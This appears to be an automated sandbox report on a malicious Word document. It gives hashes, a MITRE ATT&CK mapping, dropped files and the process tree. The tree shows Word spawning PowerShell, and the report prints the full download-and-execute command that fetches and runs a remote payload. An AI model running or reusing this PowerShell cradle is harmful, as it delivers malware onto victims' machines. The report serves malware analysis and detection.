Analysis

  • max time kernel
    47s
  • max time network
    38s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-07-2024 21:18

General

  • Target

    5cf13a476f1f40376b32a6fd7b866a8d1441f98cc131a8bbcebe35e7dcf0dff2.doc

  • Size

    34KB

  • MD5

    5c2797ab79310c379e44ae2987dca9f3

  • SHA1

    2fcc0edddc6274f89e03711ae40c8e5ef0bb47e9

  • SHA256

    5cf13a476f1f40376b32a6fd7b866a8d1441f98cc131a8bbcebe35e7dcf0dff2

  • SHA512

    6c31d93e8f3a22ce20ecfe3d6a0e2b1c72f9526b4c39a197dea6d47ffb282a00cb44768bdd57c57a2772af749d989564a4b6ec8b14f47d997a1e5cabee013a4c

  • SSDEEP

    384:A3SiSwvxjk+tb/sWk+MlTT50jmtcgWFeFaJH:A3Vxw+tD7SXMgWFeFa9

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://192.168.166.158/payload.txt

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5cf13a476f1f40376b32a6fd7b866a8d1441f98cc131a8bbcebe35e7dcf0dff2.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3048
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -exec bypass -nop -c IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.166.158/payload.txt'))
    1⤵
    • Process spawned unexpected child process
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:636

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCDE49B.tmp\sist02.xsl
    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_txmws0rq.pkl.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
    Filesize

    1KB

    MD5

    83933a816669376f06c632e2d2a26a47

    SHA1

    810026b9dd5070020046ec4337bff005d079ad62

    SHA256

    56dfe337060da028935374007c4baa0ae9caead646707b59d85f2d1110c32dad

    SHA512

    3c1da227d4da264729a062a19d8a26e5b6d2c5d8cf4075999bab7bf562778637730b1df8702d3e98c949d99435e77bc4345e96317705132c5127c5ee20d69b44

  • memory/636-35-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/636-174-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/636-42-0x00000218C2100000-0x00000218C2122000-memory.dmp
    Filesize

    136KB

  • memory/3048-17-0x00007FFBE37C0000-0x00007FFBE37D0000-memory.dmp
    Filesize

    64KB

  • memory/3048-20-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-9-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-6-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-11-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-12-0x00007FFBE37C0000-0x00007FFBE37D0000-memory.dmp
    Filesize

    64KB

  • memory/3048-10-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-13-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-15-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-18-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-0-0x00007FFBE6010000-0x00007FFBE6020000-memory.dmp
    Filesize

    64KB

  • memory/3048-16-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-14-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-7-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-22-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-21-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-19-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-30-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-31-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-8-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-4-0x00007FFBE6010000-0x00007FFBE6020000-memory.dmp
    Filesize

    64KB

  • memory/3048-5-0x00007FFC2602D000-0x00007FFC2602E000-memory.dmp
    Filesize

    4KB

  • memory/3048-1-0x00007FFBE6010000-0x00007FFBE6020000-memory.dmp
    Filesize

    64KB

  • memory/3048-3-0x00007FFBE6010000-0x00007FFBE6020000-memory.dmp
    Filesize

    64KB

  • memory/3048-171-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB

  • memory/3048-2-0x00007FFBE6010000-0x00007FFBE6020000-memory.dmp
    Filesize

    64KB

  • memory/3048-175-0x00007FFC25F90000-0x00007FFC26185000-memory.dmp
    Filesize

    2.0MB